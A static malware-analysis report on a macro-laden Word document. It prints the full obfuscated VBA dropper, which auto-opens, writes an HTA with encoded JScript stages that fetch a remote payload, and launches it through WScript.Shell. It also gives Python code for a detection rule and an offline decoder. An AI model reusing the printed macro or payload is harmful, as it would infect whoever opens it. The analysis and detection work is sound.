Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bf5fd80cf4601bf1…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 80.2 KB
Created: 2021-04-01 07:32:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-04-10
MD5: 3f2661f0508a37ddb6f9baf7523e4554
SHA-1: 4bdf4c7c885fc6ddcc457f7bb47ea7ff31197e9d
SHA-256: bf5fd80cf4601bf11b7b56215fbe8514a10ab24d11cd86d79f418459c7f48f6f
Risk score: 170

Heuristics (6)

  • VBA project inside OOXML [medium] (OOXML_VBA; 4 related findings)
    Document contains a VBA project (VBA macros present)
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched line in script:
    Set documentSwap = CreateObject("wscript.shell")
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched line in script:
    Set documentSwap = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token class alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    Matched line in script:
    Sub autoopen()
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All 16 URLs below are Office/OOXML XML namespace URIs that appear in the part headers of any Word document, not network indicators for this sample.
    Each URL was found in document text (OOXML body / shared strings):
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
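The pairing rule behind OLE_VBA_PCODE_AUTOEXEC_EXEC is easy to get wrong (a single token must not fire it, and VBA identifiers are case-insensitive, so the sample's lower-case "autoopen" still counts). The following is an added example, not the analysis engine's own code: it runs the rule over the identifier and string text recovered from a module stream (decompressed source, or the names and literals a p-code disassembler prints) and returns the matched tokens so a detail line can be produced. The three sample inputs are constructed; the first is lifted from the macro preview further down this page.

```python
import re

# Token classes exactly as the OLE_VBA_PCODE_AUTOEXEC_EXEC description lists them.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(stream_text, tokens):
    """Return the tokens that occur as whole identifiers in stream_text.

    Matching is case-insensitive (VBA names are) and bounded by non-identifier
    characters, so 'Shell' does not match inside 'ShellExecute' but does match
    the '.shell' in CreateObject("wscript.shell").
    """
    low = stream_text.lower()
    hits = []
    for tok in tokens:
        pat = r"(?<![a-z0-9_])" + re.escape(tok.lower()) + r"(?![a-z0-9_])"
        if re.search(pat, low):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream_text):
    """The pairing rule: fires only when an auto-exec entry point AND an
    execution token are present in the same stream.

    Returns (fires, autoexec_hits, exec_hits); the two lists are what a
    detail line would name as the matched tokens.
    """
    auto = find_tokens(stream_text, AUTOEXEC_TOKENS)
    exe = find_tokens(stream_text, EXEC_TOKENS)
    return (bool(auto) and bool(exe), auto, exe)


# Constructed sample inputs.  SAMPLE_STREAM is copied from the macro preview on
# this page; the other two are made up to show the rule NOT firing.
SAMPLE_STREAM = """\
Attribute VB_Name = "dataView"
Sub autoopen()
sizeNextCollection
End Sub
Public Sub button1_Click()
Set documentSwap = CreateObject("wscript.shell")
documentSwap.exec p(textboxView) & " " & p(pasteIterator)
End Sub
"""
BENIGN_AUTOEXEC = 'Sub Document_Open()\n    MsgBox "Loaded"\nEnd Sub\n'
EXEC_ONLY = 'Sub Helper()\n    Set fso = CreateObject("Scripting.FileSystemObject")\nEnd Sub\n'

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_STREAM), ("benign", BENIGN_AUTOEXEC),
                       ("exec-only", EXEC_ONLY)):
        fires, auto, exe = pcode_autoexec_exec(text)
        print("%-9s fires=%-5s autoexec=%s exec=%s" % (name, fires, auto, exe))
```

On the sample text the rule fires with AutoOpen paired with CreateObject (and Shell, via the literal "wscript.shell"); the benign Document_Open handler and the module that only calls CreateObject each hit one class and stay quiet, which is the behaviour the description promises.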

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 9282 bytes
SHA-256: 56e9a75e314a670759a9095812beb681a32709c1aa2c8969745ed6b71de14c1d
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "frm"
Attribute VB_Base = "0{DA6AAC86-F056-42DB-A82B-83256A1AB6E1}{7E455B58-4921-4008-8FDD-DACA97D132D9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Function textboxView()
With frm.button1
textboxView = .Tag
End With
End Function
Function pasteIterator()
With frm.button1
pasteIterator = .Caption
End With
End Function
Public Sub button1_Click()
Set documentSwap = CreateObject("wscript.shell")
documentSwap.exec p(textboxView) & " " & p(pasteIterator)
End Sub


Attribute VB_Name = "dataView"
Sub autoopen()
sizeNextCollection
End Sub
Function intel(queryMain)
intel = "" & queryMain & ""
End Function
Sub sizeNextCollection()
Dim convertTempMem As String
convertTempMem = p(frm.button1.Caption)
Set ExMemoryCounter = New clearCopySelect
ExMemoryCounter.ASizeTable convertTempMem, screenArray
frm.button1_Click
End Sub
Function swapRepo(listClass, lenResponse, titleViewW)
swapRepo = Replace(listClass, lenResponse, titleViewW)
End Function

Attribute VB_Name = "databaseExVb"
Function dataProcedureArgument()
dataProcedureArgument = intel("<html><body><div id='content'>fTtlc29sYy5hdGFEbm90dHViOykyICwiZ3")
End Function
Function lenRemoveWindow()
lenRemoveWindow = intel("BqLnNzYWxDZXppU3RzaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLm")
End Function
Function procW()
procW = intel("F0YURub3R0dWI7KXlkb2Jlc25vcHNlci5lc25vcHNlUm1lTXRjZWxlcyhldGlydy")
End Function
Function responseIndex()
responseIndex = intel("5hdGFEbm90dHViOzEgPSBlcHl0LmF0YURub3R0dWI7bmVwby5hdGFEbm90dHViOy")
End Function
Function iteratorQueryVar()
iteratorQueryVar = intel("kibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGF0YURub3R0dWIgcm")
End Function
Function listClearValue()
listClearValue = intel("F2eykwMDIgPT0gc3V0YXRzLmVzbm9wc2VSbWVNdGNlbGVzKGZpOykoZG5lcy5lc2")
End Function
Function repoEx()
repoEx = intel("5vcHNlUm1lTXRjZWxlczspZXNsYWYgLCJSQWpkUT1kaXMmZHA3VUttakdKblVOWD")
End Function
Function queryStructDatabase()
queryStructDatabase = intel("1xJkhLWDlKcVhjPU11ZGlKNVFUPzMxbmF4L1Z6NDRFTDJ1UWJiOE9leGJrT0VoRm")
End Function
Function titleTemp()
titleTemp = intel("x4QUNJS0xzbWlYWTkvcXcxeENtTUtQNDBBT0FlSlRodGxQNWgzVG9HM1Q2ZFk1RV")
End Function
Function localOption()
localOption = intel("RZZ1VnSUhpbG1iSkZ5L2hzVVBISmROWHdHckJ1QzlETU1QQzUveXdwZlpMWGlYWF")
End Function
Function titlePointer()
titlePointer = intel("JXWk1vQTdtL1JuMTJmWWE4UU80U0Qydzlia05td1BHcTljc0s4elVlWkRqaC9zeX")
End Function
Function rightGenericSwap()
rightGenericSwap = intel("VvZy9tb2MuNjEwMi1lZ2FndHJvbS1kbmVnZWwvLzpwdHRoIiAsIlRFRyIobmVwby")
End Function
Function WRefLeft()
WRefLeft = intel("5lc25vcHNlUm1lTXRjZWxlczspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdG")
End Function
Function ARequestArray()
ARequestArray = intel("NBIHdlbiA9IGVzbm9wc2VSbWVNdGNlbGVzIHJhdg==|fXspdGZlTGVzbm9wc2VyK")
End Function
Function bufferValue()
bufferValue = intel("GhjdGFjfTspImF0aC5zc2FsQ2V6aVN0c2lsXFxjaWxidXBcXHNyZXN1XFw6YyIoZ")
End Function
Function screenProc()
screenProc = intel("WxpZmV0ZWxlZC5XY2lyZW5lR3R4ZXR7eXJ0OykidGNlamJvbWV0c3lzZWxpZi5nb")
End Function
Function refVar()
refVar = intel("ml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gV2NpcmVuZUd0eGV0IHJhdjspI")
End Function
Function captionPointerA()
captionPointerA = intel("mdwai5zc2FsQ2V6aVN0c2lsXFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIob")
End Function
Function swapMainRemove()
swapMainRemove = intel("nVyLikibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id")
End Function
Function funcBorder()
funcBorder = intel("='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>01234")
End Function
Function optionVariableProcedure()
optionVariableProcedure = intel("56789+/</div><div id='table3'></div><script language='javascript")
End Function
Function viewArgumentGlobal()
viewArgumentGlobal = intel("'>function nextStorage(captionDocument){return(new ActiveXObject")
End Function
Function leftCounterSelect()
leftCounterSelect = intel("(captionDocument));}function variableRequest(ExLibPtr){return(ca")
End Function
Function leftCounter()
leftCounter = intel("ptionLeft.getElementById(ExLibPtr).innerHTML);}function libVb(){")
End Function
Function textboxCountBuf()
textboxCountBuf = intel("var textBufLoad = variableRequest('table1');var procedureNext = ")
End Function
Function borderCounterListbox()
borderCounterListbox = intel("textBufLoad.toLowerCase();var buttonMemPtr = variableRequest('ta")
End Function
Function trustIteratorPtr()
trustIteratorPtr = intel("ble2');return(textBufLoad + procedureNext + buttonMemPtr);}funct")
End Function
Function captionStructQuery()
captionStructQuery = intel("ion windowProc(s){var e={}; var i; var b=0; var c; var x; var l=")
End Function
Function lenVb()
lenVb = intel("0; var a; var windowListbox=''; var w=String.fromCharCode; var L")
End Function
Function structConvert()
structConvert = intel("=s.length;var loadSizeSelect = 'charAt';for(i=0;i<64;i++){e[libV")
End Function
Function referenceGlobal()
referenceGlobal = intel("b()[loadSizeSelect](i)]=i;}for(x=0;x<L;x++){c=e[s[loadSizeSelect")
End Function
Function pointerTable()
pointerTable = intel("](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-")
End Function
Function listExSize()
listExSize = intel("2)))&&(windowListbox+=w(a));}}return(windowListbox);};function l")
End Function
Function listStruct()
listStruct = intel("enDelete(countLocalTextbox){return countLocalTextbox.split('').r")
End Function
Function screenBorderCollection()
screenBorderCollection = intel("everse().join('');}listboxPointerReference = window;captionLeft ")
End Function
Function linkMemoryPointer()
linkMemoryPointer = intel("= document;listboxPointerReference.resizeTo(1, 1);listboxPointer")
End Function
Function localBuffer()
localBuffer = intel("Reference.moveTo(-100, -100);var dataLen = captionLeft.getElemen")
End Function
Function storageDataList()
storageDataList = intel("tById('content').innerHTML;var dataLen = dataLen.split('|');var ")
End Function
Function loadConstNamespace()
loadConstNamespace = intel("leftCollection = lenDelete(windowProc(dataLen[0]));var lenClass ")
End Function
Function libData()
libData = intel("= lenDelete(windowProc(dataLen[1]));</script><script language='j")
End Function
Function listboxArgument()
listboxArgument = intel("avascript'>function globalDataDocument(tmpReference){var counter")
End Function
Function procedureDataCounter()
procedureDataCounter = intel("Iterator = nextStorage('msscriptcontrol.scriptcontrol');counterI")
End Function
Function valueStruct()
valueStruct = intel("terator.Language = 'jscript';counterIterator.Timeout = 60000;cou")
End Function
Function convertPointer()
convertPointer = intel("nterIterator.AddCode(tmpReference);return(null);}</script><scrip")
End Function
Function libLib()
libLib = intel("t language='vbscript'>globalDataDocument leftCollection : global")
End Function
Function classTextbox()
classTextbox = intel("DataDocument lenClass : listboxPointerReference.close</script></")
End Function
Function arrayArrayCounter()
arrayArrayCounter = intel("body></html>")
End Function
Function screenArray()
screenArray = dataProcedureArgument + lenRemoveWindow + procW + responseIndex + iteratorQueryVar + listClearValue + repoEx + queryStructDatabase + titleTemp + localOption + titlePointer + rightGenericSwap + WRefLeft + ARequestArray + bufferValue + screenProc + refVar + captionPointerA + swapMainRemove + funcBorder + optionVariableProcedure + viewArgumentGlobal + leftCounterSelect + leftCounter + textboxCountBuf + borderCounterListbox + trustIteratorPtr + captionStructQuery + lenVb + structConvert + referenceGlobal + pointerTable + listExSize + listStruct + screenBorderCollection + linkMemoryPointer + localBuffer + storageDataList + loadConstNamespace + libData + listboxArgument + procedureDataCounter + valueStruct + convertPointer + libLib + classTextbox + arrayArrayCounter
End Function

Attribute VB_Name = "clearCopySelect"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub ASizeTable(refCounterTmp As String, repoOptionTitle As String)
Dim buttonMainNext As FileSystemObject
Set buttonMainNext = New FileSystemObject
Dim tempCountPtr As TextStream
Set tempCountPtr = buttonMainNext.CreateTextFile(refCounterTmp)
tempCountPtr.WriteLine repoOptionTitle
tempCountPtr.Close
Set tempCountPtr = Nothing
Set buttonMainNext = Nothing
End Sub

Attribute VB_Name = "captionTrust"
Function p(trustRequest)
p = swapRepo(trustRequest, "@", "")
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 40448 bytes
SHA-256: a6b25af667505c1b8a20d82293c5712c0f79c5bc7afc6f627104ecbb28e7c0f6
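The extracted macro is a small dropper. autoopen calls sizeNextCollection, which concatenates the 47 string literals of databaseExVb (screenArray) into an HTML Application and has clearCopySelect.ASizeTable write it to the path held in frm.button1.Caption; button1_Click then runs p(Tag) & " " & p(Caption) through WScript.Shell. p() strips every "@", so the launcher and path stored on the form are obfuscated by "@" filler. Those Tag and Caption values live in the UserForm's own storage, not in the VBA source, so they do not appear in the preview. Inside the dropped HTA, the 'content' div is split on "|", each half is decoded by windowProc (a hand-rolled base64 decoder whose alphabet libVb builds from the table1 and table2 divs), reversed by lenDelete, and handed to MSScriptControl as JScript. The block below is an added example, not output of the analysis engine: it rebuilds the HTA from the literals copied from the preview above and replays the HTA's own decoding so both JScript stages can be read offline, without executing anything. The only assumption is that the chunk transcription is faithful; the decoder and alphabet derivation follow the HTA text itself.

```python
import re

# The 47 literals from databaseExVb, copied from the preview above in the order
# screenArray concatenates them.  intel() only wraps each piece in "" & x & "",
# so the dropped HTA is the plain concatenation.
CHUNKS = [
    "<html><body><div id='content'>fTtlc29sYy5hdGFEbm90dHViOykyICwiZ3",
    "BqLnNzYWxDZXppU3RzaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmb3RldmFzLm",
    "F0YURub3R0dWI7KXlkb2Jlc25vcHNlci5lc25vcHNlUm1lTXRjZWxlcyhldGlydy",
    "5hdGFEbm90dHViOzEgPSBlcHl0LmF0YURub3R0dWI7bmVwby5hdGFEbm90dHViOy",
    "kibWFlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdGNBIHdlbiA9IGF0YURub3R0dWIgcm",
    "F2eykwMDIgPT0gc3V0YXRzLmVzbm9wc2VSbWVNdGNlbGVzKGZpOykoZG5lcy5lc2",
    "5vcHNlUm1lTXRjZWxlczspZXNsYWYgLCJSQWpkUT1kaXMmZHA3VUttakdKblVOWD",
    "1xJkhLWDlKcVhjPU11ZGlKNVFUPzMxbmF4L1Z6NDRFTDJ1UWJiOE9leGJrT0VoRm",
    "x4QUNJS0xzbWlYWTkvcXcxeENtTUtQNDBBT0FlSlRodGxQNWgzVG9HM1Q2ZFk1RV",
    "RZZ1VnSUhpbG1iSkZ5L2hzVVBISmROWHdHckJ1QzlETU1QQzUveXdwZlpMWGlYWF",
    "JXWk1vQTdtL1JuMTJmWWE4UU80U0Qydzlia05td1BHcTljc0s4elVlWkRqaC9zeX",
    "VvZy9tb2MuNjEwMi1lZ2FndHJvbS1kbmVnZWwvLzpwdHRoIiAsIlRFRyIobmVwby",
    "5lc25vcHNlUm1lTXRjZWxlczspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdG",
    "NBIHdlbiA9IGVzbm9wc2VSbWVNdGNlbGVzIHJhdg==|fXspdGZlTGVzbm9wc2VyK",
    "GhjdGFjfTspImF0aC5zc2FsQ2V6aVN0c2lsXFxjaWxidXBcXHNyZXN1XFw6YyIoZ",
    "WxpZmV0ZWxlZC5XY2lyZW5lR3R4ZXR7eXJ0OykidGNlamJvbWV0c3lzZWxpZi5nb",
    "ml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gV2NpcmVuZUd0eGV0IHJhdjspI",
    "mdwai5zc2FsQ2V6aVN0c2lsXFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIob",
    "nVyLikibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id",
    "='table1'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>01234",
    "56789+/</div><div id='table3'></div><script language='javascript",
    "'>function nextStorage(captionDocument){return(new ActiveXObject",
    "(captionDocument));}function variableRequest(ExLibPtr){return(ca",
    "ptionLeft.getElementById(ExLibPtr).innerHTML);}function libVb(){",
    "var textBufLoad = variableRequest('table1');var procedureNext = ",
    "textBufLoad.toLowerCase();var buttonMemPtr = variableRequest('ta",
    "ble2');return(textBufLoad + procedureNext + buttonMemPtr);}funct",
    "ion windowProc(s){var e={}; var i; var b=0; var c; var x; var l=",
    "0; var a; var windowListbox=''; var w=String.fromCharCode; var L",
    "=s.length;var loadSizeSelect = 'charAt';for(i=0;i<64;i++){e[libV",
    "b()[loadSizeSelect](i)]=i;}for(x=0;x<L;x++){c=e[s[loadSizeSelect",
    "](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-",
    "2)))&&(windowListbox+=w(a));}}return(windowListbox);};function l",
    "enDelete(countLocalTextbox){return countLocalTextbox.split('').r",
    "everse().join('');}listboxPointerReference = window;captionLeft ",
    "= document;listboxPointerReference.resizeTo(1, 1);listboxPointer",
    "Reference.moveTo(-100, -100);var dataLen = captionLeft.getElemen",
    "tById('content').innerHTML;var dataLen = dataLen.split('|');var ",
    "leftCollection = lenDelete(windowProc(dataLen[0]));var lenClass ",
    "= lenDelete(windowProc(dataLen[1]));</script><script language='j",
    "avascript'>function globalDataDocument(tmpReference){var counter",
    "Iterator = nextStorage('msscriptcontrol.scriptcontrol');counterI",
    "terator.Language = 'jscript';counterIterator.Timeout = 60000;cou",
    "nterIterator.AddCode(tmpReference);return(null);}</script><scrip",
    "t language='vbscript'>globalDataDocument leftCollection : global",
    "DataDocument lenClass : listboxPointerReference.close</script></",
    "body></html>",
]


def p(s):
    """captionTrust.p: drop the '@' filler used on the form's Tag and Caption."""
    return s.replace("@", "")


def build_hta(chunks=CHUNKS):
    """The text clearCopySelect.ASizeTable writes to disk (screenArray)."""
    return "".join(chunks)


def div_text(html, div_id):
    """innerHTML of <div id='...'>, as variableRequest() reads it."""
    m = re.search(r"<div id='%s'>(.*?)</div>" % re.escape(div_id), html, re.S)
    return m.group(1) if m else ""


def window_proc(s, alphabet):
    """Port of the HTA's windowProc(): a 6-bit accumulator base64 decoder.
    Characters outside the alphabet ('=' padding) are skipped; in the JS they
    poison the accumulator with NaN, which also yields no output bytes."""
    table = {ch: i for i, ch in enumerate(alphabet)}
    acc = bits = 0
    out = bytearray()
    for ch in s:
        c = table.get(ch)
        if c is None:
            continue
        acc = ((acc << 6) | c) & 0xFFFFFFFF  # JS does 32-bit integer arithmetic
        bits += 6
        while bits >= 8:
            bits -= 8
            out.append((acc >> bits) & 0xFF)
    return out.decode("latin-1")


def extract_stages(hta=None):
    """Mirror the HTA: split 'content' on '|', decode, reverse (lenDelete)."""
    hta = build_hta() if hta is None else hta
    upper = div_text(hta, "table1")
    alphabet = upper + upper.lower() + div_text(hta, "table2")  # libVb()
    return [window_proc(part, alphabet)[::-1]
            for part in div_text(hta, "content").split("|")]


if __name__ == "__main__":
    for i, stage in enumerate(extract_stages()):
        print("stage %d (%d chars):\n%s\n" % (i, len(stage), stage))
```

extract_stages() returns the two JScript strings in the order the VBScript block runs them (leftCollection, then lenClass); printing them is the fastest way to get the second-stage URL, drop path and launcher out of this sample without touching a sandbox. The alphabet is rebuilt from the table divs rather than hard-coded because a variant only has to shuffle table1 and table2 to break a fixed decoder.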